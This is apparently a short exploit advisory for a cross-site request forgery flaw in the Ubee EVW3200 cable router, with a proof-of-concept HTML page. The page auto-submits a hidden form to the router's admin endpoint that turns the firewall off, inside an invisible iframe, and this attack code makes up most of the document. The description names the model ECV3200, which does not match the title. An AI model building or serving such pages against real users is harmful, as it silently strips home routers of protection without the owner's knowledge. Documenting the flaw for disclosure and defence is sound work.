# Exploit Title: Ubee EVW3200 - Multiple Cross Site Request Forgery# Google Dork: N/A# Date: 02-03-2014# Exploit Author: Jeroen - IT Nerdbox# Vendor Homepage: http://www.ubeeinteractive.com/# Software Link:
http://www.ubeeinteractive.com/products/cable?field_product_catetory_tid=20# Version: All# Tested on: N/A# CVE : N/A### Description:## The Ubee ECV3200 does not use Anti CSRF tokens in any of its forms. ### PoC:# # <form name="reseller" method="POST"
action="http://192.168.178.1/goform/RgContentFilter"id="csrf_attack"
target="csrf_iframe"># <input type="hidden" name="cbFirewall" value="0"># </form>## <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>## <script>#document.getElementById('csrf_attack').submit();# </script># <center>The payload has been executed....</center> #</html>### More information can be found at:
http://www.nerdbox.it/ubee-evw3200-multiple-vulnerabilities/
